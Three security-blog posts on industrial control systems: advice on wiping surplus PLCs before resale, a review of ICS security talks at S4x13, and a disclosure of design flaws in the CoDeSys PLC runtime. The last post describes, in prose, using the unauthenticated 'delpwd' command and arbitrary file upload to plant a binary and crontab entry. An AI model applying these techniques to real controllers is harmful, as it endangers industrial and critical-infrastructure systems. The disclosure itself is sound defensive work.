INSIGHTS | July 4, 2013

Why sanitize excessed equipment

My passion for cybersecurity centers on industrial controllers–PLCs, RTUs, and the other “field devices.” These devices are the interface between the integrator (e.g., HMI systems, historians, and databases) and the process (e.g., sensors and actuators). Researching this equipment can be costly because PLCs and RTUs cost thousands of dollars. Fortunately, I have an ally: surplus resellers that sell used equipment.

I have been buying used equipment for a few years now. Equipment often arrives to me literally ripped from a factory floor or even a substation. Each controller typically contains a wealth of information about its origin. I can often learn a lot about a company from a piece of used equipment. Even decades-old control equipment has a lot of memory and keeps a long record about the previous owner’s process. It is possible to learn the “secret recipe” with just a few hours of work at reverse engineering a controller to collect company names, control system network layout, and production history. Even engineers’ names and contact information is likely to be stored in a controller’s log file. For a bad guy, the data could be useful for all sorts of purposes: social engineering employees, insider trading of company stock, and possibly direct attacks to the corporate network.
I reach out to the origin of used equipment when I find these types of information. I help them wipe the equipment, and I point them to where the rest of the equipment is being sold in an attempt to recall it before the stored information ends up in the wrong hands. I am not the only one doing this kind of work. Recently, Billy Rios and Terry McCorkle revealed surplus equipment that they had purchased from a hospital. It had much of the same information about its origin.

These situations can be prevented by sanitizing the equipment before it’s released for disposal. Many equipment manufacturers should be able to provide instructions for this process. One option may be to send the controller back to the manufacturer to be sanitized and refurbished.
A way to provide another layer of protection against information disclosure is to have a robust and well-practiced Incident Response plan. Most places that I contact are great to work with and are receptive to the information.

Ignoring the issue, especially where a public utility is concerned, may be considered a violation. Set up an Incident Response program now and make sure that your process control engineers know to send equipment disposal issues through the IR group.

 

A great deal can be accomplished to keep a control system secure. With a little planning, proper equipment disposal is one of the cheapest things that can be done to keep proprietary process information safe.
INSIGHTS | January 25, 2013

S4x13 Conference

S4 is my favorite conference. This is mainly because it concentrates on industrial control systems security, which I am passionate about. I also enjoy the fact that the presentations cover mostly advanced topics and spend very little time covering novice topics.

Over the past four years, S4 has become more of a bits and bytes conference with presentations that explain, for example, how to upload Trojan firmwares to industrial controllers and exposés that cover vulnerabilities (in the “insecure by design” and “ICS-CERT” sense of the word).

This year’s conference was packed with top talent from the ICS and SCADA worlds and offered a huge amount of technical information. I tended to follow the “red team” track, as these talks broke varying levels of control systems networks.

Sergey Gordeychick gave a great talk on the vulnerabilities in various ICS software applications, including the release of an “1825-day exploit” for WinCC, which Siemens did not patch for five years. (The vulnerability finally closed in December 2012.)
 

Alexander Timorin and Dmitry Skylarov released a new tool for reversing S7 passwords from a packet capture. A common feature of many industrial controllers includes homebrew hashing algorithms and authentication mechanisms that simply fall apart under a few days of scrutiny. Their tool is being incorporated into John the Ripper. A trend in the ICS space seems to include the incorporation of ICS-specific attacks into current attack frameworks. This makes ICS hacking far more available to network security assessors, as well as to the “Bad Guys”. My guess is that this trend will continue in 2013.
Billy Rios and Terry McCorkle talked about medical controllers and showed a Phillips XPER controller that they had purchased on eBay. The computer itself had not been wiped and contained hard-coded accounts as well as trivial buffer overflow vulnerabilities running on Windows XP.
Arthur Gervais released a slew of Schneider Modicon PLC-related vulnerabilities. Schneider’s service for updating Unity (the engineering software for Modicon PLCs) and other utilities used HTTP to download software updates, for example. I was sad that I missed his talk due to a conflict in the speaking schedule.
Luigi Auriemma and his colleague Donato Ferrante demonstrated their own binary patching system, which allows them to patch applications while they are executing. The technology shows a lot of promise. They are currently marketing it as a way to provide patches for unsupported software. I think that the true potential of their system is to patch industrial systems without shutting down the process. It may take a while for any vendor to adopt this technique, but it could be a powerful motivator to get end users to apply patches. Scheduling an outage window is the most-cited reason for not patching industrial systems, and ReVuln is showing that we can work around this limitation.

 

My favorite talk was one that was only semi-technical in nature and more defensive than offensive. It was about implementing an SDL and a fuzz-testing strategy at OSISoft. OSISoft’s PI server is the most frequently used data historian for industrial processes. Since C-level employees want to keep track of how their process is doing, historical data often must be exported from the control systems network to the corporate network in some fashion. In the best case scenario, this is usually done by way of a PI Server in the DMZ. In the worst case scenario, a corporate system will reach into the control network to communicate with the PI server. Either way, the result is the same: PI is a likely target if an attacker wants to jump from the corporate network to the control network. It is terrific and all too rare still to see a software company in ICS sharing their security experiences.

 

Digital Bond provides a nice “by the numbers” look at the conference.
If you are technical and international minded and want to talk to actual ICS operators, S4 is a great place to start.
INSIGHTS | October 30, 2012

3S Software’s CoDeSys: Insecure by Design

My last project before joining IOActive was “breaking” 3S Software’s CoDeSys PLC runtime for Digital Bond.

Before the assignment, I had a fellow security nut give me some tips on this project to get me off the ground, but unfortunately this person cannot be named. You know who you are, so thank you, mystery person.

The PLC runtime is pretty cool, from a hacker perspective. CoDeSys is an unusual ladder logic runtime for a number of reasons.

 

Different vendors have different strategies for executing ladder logic. Some run ladder logic on custom ASICs (or possibly interpreter/emulators) on their PLC processor, while others execute ladder logic as native code. For an introduction to reverse-engineering the interpreted code and ASIC code, check out FX’s talk on Decoding Stuxnet at C3. It really is amazing, and FX has a level of patience in disassembling code for an unknown CPU that I think is completely unique.

 

CoDeSys is interesting to me because it doesn’t work like the Siemens ladder logic. CoDeSys compiles your ladder logic as byte code for the processor on which the ladder logic is running. On our Wago system, it was an x86 processor, and the ladder logic was compiled x86 code. A CoDeSys ladder logic file is literally loaded into memory, and then execution of the runtime jumps into the ladder logic file. This is great because we can easily disassemble a ladder logic file, or better, build our own file that executes system calls.

 

I talked about this oddity at AppSec DC in April 2012. All CoDeSys installations seem to fall into three categories: the runtime is executing on top of an embedded OS, which lacks code privilege separation; the runtime is executing on Linux with a uid of 0; or the runtime is executing on top of Windows CE in single user mode. All three are bad for the same reasons.

 

All three mean of course that an unauthenticated user can upload an executable file to the PLC, and it will be executed with no protection. On Windows and Linux hosts, it is worse because the APIs to commit Evil are well understood.

 

 I had said back in April that CoDeSys is in an amazing and unique position to help secure our critical infrastructure. Their product is used in thousands of product lines made by hundreds of vendors. Their implementation of secure ladder logic transfer and an encrypted and digitally signed control protocol would secure a huge chunk of critical infrastructure in one pass.

 

3S has published an advisory on setting passwords for CoDeSys as the solution to the ladder logic upload problem. Unfortunately, the password is useless unless the vendors (the PLC manufacturers who run CoDeSys on their PLC) make extensive modification to the runtime source code.

 

Setting a password on CoDeSys protects code segments. In theory, this can prevent a user from uploading a new ladder logic program without knowing the password. Unfortunately, the shell protocol used by 3S has a command called delpwd, which deletes the password and does not require authentication. Further, even if that little problem was fixed, we still get arbitrary file upload and download with the privileges of the process (remember the note about administrator/root?). So as a bad guy, I could just upload a new binary, upload a new copy of the crontab file, and wait patiently for the process to execute.

 

The solution that I would like to see in future CoDeSys releases would include a requirement for authentication prior to file upload, a patch for the directory traversal vulnerability, and added cryptographic security to the protocol to prevent man-in-the-middle and replay attacks.